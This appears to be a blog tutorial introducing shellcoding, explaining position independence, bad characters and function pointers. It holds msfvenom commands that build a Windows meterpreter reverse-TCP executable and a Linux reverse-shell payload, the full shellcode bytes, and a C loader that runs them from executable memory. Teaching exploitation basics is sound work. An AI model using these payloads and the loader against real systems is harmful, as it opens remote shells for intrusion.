14. Introduction to Shellcoding
Shellcoding is the art of writing compact, position-independent machine code that can be injected and executed inside another process. At its core, shellcode is pure machine code — hexadecimal bytes that the CPU executes directly. It’s not a high-level language; there’s no compiler to hold your hand. The name is a bit of a misnomer; it historically referred to code that spawned a shell (like /bin/sh), but now it’s a general term for the payload in an exploit, which could do anything: reverse a shell, add a user, or just call a specific API.
This section explains what shellcode is, why it matters, how to write effective shellcode.
The key challenges are:
- It must be self-contained. No linking to external libraries.
- It must be position-independent. It doesn’t know where in memory it will live.
- It must avoid certain bytes (bad characters). No null bytes (
0x00) which would terminate a string copy, and often no newlines (0x0a) or carriage returns (0x0d).
Does size matter?
Yes — and not just historically. Payloads used to have very tight size limits, and even today smaller payloads are easier to hide and more portable. Rather than calling library functions, shellcode typically invokes syscalls (the kernel interface) directly.
Before starting this I highly encourage you to complete the previous posts related to x86-64 assembly.
Shellcode vs. Payload: What’s the Real Difference?
If you’re diving into the world of exploitation, you’ve likely heard the terms “shellcode” and “payload” used, sometimes even interchangeably. While they are closely related, they are not the same thing.
The Analogy: A Military Operation
Think of a cyber attack like a special forces operation:
- The Payload is the entire mission package. It’s the overall objective: “Infiltrate the enemy base, plant a listening device in the commander’s office, and exfiltrate undetected.” The payload defines the what and the why.
- The Shellcode is the highly trained commando team itself. They are the self-contained, executable component that carries out the core, technical task. They are the how.
Example: A Metasploit Payload
When you use msfvenom in Metasploit, you are generating a complete payload. For example:
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > malicious.exe
This payload (malicious.exe) contains:
- The shellcode responsible for creating the reverse TCP connection.
- A decoder stub to decode the shellcode if encoding was used.
- All the necessary configuration data (IP, port).
- Wrapped in an executable format.
Let’s generate Linux shellcode using msfvenom and try to execute it using C. msfvenom is a command-line utility that comes with the Metasploit Framework.
Let’s generate a simple Linux x64 shellcode that creates a reverse TCP shell. This is one of the most common payloads - it will connect back to our machine and give us a shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 338 bytes
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";
Now we need a way to execute this raw machine code. We’ll create a simple C program that places our shellcode in memory and jumps to it.
Let’s create a C file shellcode_loader.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>
#include <string.h>
// Our msfvenom-generated shellcode
unsigned char code[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05";
int main() {
printf("Shellcode Length: %zu bytes\n", strlen(code));
// Cast the shellcode array to a function pointer and execute
int (*ret)() = (int(*)())code;
printf("Starting execution...\n");
ret();
// This line will only be reached if the shellcode fails
printf("Shellcode execution completed (or failed)\n");
return 0;
}
When we try to compile this on Modern system it will likely to be failed.
By default, modern systems have security protections that would prevent our shellcode from running. Modern systems use Data Execution Prevention (DEP) or W^X (Write XOR Execute) policy:
- Memory pages can be either writable OR executable, but not both
- This prevents attackers from injecting and executing code
We need to use mmap. You can learn more about mmap in my System Programming Series
1
2
3
void *exec_mem = mmap(NULL, sizeof(code),
PROT_READ | PROT_WRITE | PROT_EXEC, // ← Explicitly requesting EXECUTE permission
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
Using mmap we will allocate new memory region and set its permission explicitly to RWX. The shellcode will be copied to this memory region and then the CPU can execute instructions from this region.
Let’s try to implement this behaviour.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
// Our msfvenom-generated shellcode
unsigned char code[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97"
"\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6"
"\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce"
"\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f"
"\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48"
"\x89\xe6\x0f\x05"; // Stored in data section (RW-)
int main() {
printf("Shellcode Length: %zu bytes\n", strlen(code));
// Allocate executable memory
void *exec_mem = mmap(NULL, sizeof(code),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (exec_mem == MAP_FAILED) {
perror("mmap failed");
return 1;
}
printf("Allocated executable memory at: %p\n", exec_mem);
// Copy shellcode to executable memory
memcpy(exec_mem, code, sizeof(code));
printf("Executing shellcode...\n");
/* PROBLEM */
// int (*ret)() = (int(*)())code; // Trying to execute data section
// ret();
// Cast to function pointer and execute
int (*func)() = (int(*)())exec_mem;
func();
// Cleanup (though we may not reach this)
munmap(exec_mem, sizeof(code));
return 0;
}
Let’s revise the Memory Layout once again -
[Text Section] - EXECUTE permission (your main() code)
[Data Section] - READ/WRITE permission (your shellcode array)
[Stack] - READ/WRITE permission
[Heap] - READ/WRITE permission
If you’re feeling overwhelmed by this line:
1
2
int (*ret)() = (int(*)())code;
ret();
You’re not alone! This syntax might look intimidating at first, but it’s actually quite logical once we break it down.
Think of your shellcode bytes:
1
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f..."
These aren’t just random numbers! Each byte is a CPU instruction that the processor understands directly:
\x6a\x29=push 0x29\x58=pop rax\x99=cdq(clear RDX)\x6a\x02=push 0x2\x5f=pop rdi- etc.
To see the complete picture, you can use an online disassembler like Defuse.ca’s Online X86 Assembler and paste your shellcode as a hex string.
First, generate the shellcode in hex format:
1
2
3
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f hex
#...
6a2958996a025f6a015e0f05489748b90200115c7f000001514889e66a105a6a2a580f056a035e48ffce6a21580f0575f66a3b589948bb2f62696e2f736800534889e752574889e60f05
Paste this into the disassembler, and you’ll see the human-readable assembly instructions:
Disassembly:
0: 6a 29 push 0x29
2: 58 pop rax
3: 99 cdq
4: 6a 02 push 0x2
6: 5f pop rdi
This visualization makes it clear: your shellcode is literally a mini-program written directly in machine language, just waiting to be executed!
Let’s look a bit of C that we already know.
1
2
3
4
5
6
7
void hello() {
printf("Hello World!\n");
}
int main() {
hello(); // Call the function
}
The function hello() is at some memory address. Calling hello() jumps to that address and executes.
What is a Function Pointer?
1
2
3
4
5
6
7
8
void hello() {
printf("Hello World!\n");
}
int main() {
void (*func_ptr)() = hello; // func_ptr points to hello's address
func_ptr(); // Calls hello via the pointer
}
Well func_ptr is a variable that holds a memory address. That address points to executable code and func_ptr() jumps to that address and executes.
Let’s try to break this -
1
int (*ret)() = (int(*)())code;
We are declaring a function pointer ret which is basically a pointer to a function. The function returns int and takes any arguments ().
(int(*)())code
- This is a cast that says: “Treat
codeas a function pointer” (int(*)())means “pointer to function returning int”- We’re telling the compiler: “I know
codeis a byte array, but trust me, it’s actually machine code”
Simplified version -
1
2
3
4
5
6
7
8
9
// Before cast: code is an array of bytes
unsigned char code[] = {0x6a, 0x29, 0x58, ...};
// After cast: ret points to the SAME memory, but we're telling
// the compiler it contains executable code
int (*ret)() = (int(*)())code;
// This generates: call [address of code]
ret();
Sometimes, the best way to understand a concept is to see it working at the lowest level. Let’s debug our function pointer example using GDB to see what’s really happening behind the scenes.
1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
void hello() {
printf("Hello World!\n");
}
int main() {
void (*func_ptr)() = hello; // func_ptr points to hello's address
func_ptr(); // Calls hello via the pointer
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ gcc -o func_ptr func_ptr.c
gdb ./func_ptr
pwndbg> start
#...
pwndbg> disass main
Dump of assembler code for function main:
0x0000555555555163 <+0>: endbr64
0x0000555555555167 <+4>: push rbp
0x0000555555555168 <+5>: mov rbp,rsp
=> 0x000055555555516b <+8>: sub rsp,0x10
0x000055555555516f <+12>: lea rax,[rip+0xffffffffffffffd3] # 0x555555555149 <hello>
0x0000555555555176 <+19>: mov QWORD PTR [rbp-0x8],rax
0x000055555555517a <+23>: mov rdx,QWORD PTR [rbp-0x8]
0x000055555555517e <+27>: mov eax,0x0
0x0000555555555183 <+32>: call rdx
0x0000555555555185 <+34>: mov eax,0x0
0x000055555555518a <+39>: leave
0x000055555555518b <+40>: ret
End of assembler dump.
Let’s step to the point where the function pointer is called:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> nextcall
#...
pwndbg> disass
Dump of assembler code for function main:
0x0000555555555163 <+0>: endbr64
0x0000555555555167 <+4>: push rbp
0x0000555555555168 <+5>: mov rbp,rsp
0x000055555555516b <+8>: sub rsp,0x10
0x000055555555516f <+12>: lea rax,[rip+0xffffffffffffffd3] # 0x555555555149 <hello>
0x0000555555555176 <+19>: mov QWORD PTR [rbp-0x8],rax
0x000055555555517a <+23>: mov rdx,QWORD PTR [rbp-0x8]
0x000055555555517e <+27>: mov eax,0x0
=> 0x0000555555555183 <+32>: call rdx
0x0000555555555185 <+34>: mov eax,0x0
0x000055555555518a <+39>: leave
0x000055555555518b <+40>: ret
If you try printing the address of hello function you’ll find it to be exactly same as the address stored in rdx.
1
2
3
4
pwndbg> p hello
$1 = {<text variable, no debug info>} 0x555555555149 <hello>
pwndbg> reg rdx
*RDX 0x555555555149 (hello) ◂— endbr64
I hope this makes things clear for you now.
Now in the next part we will deep dive into syscalls.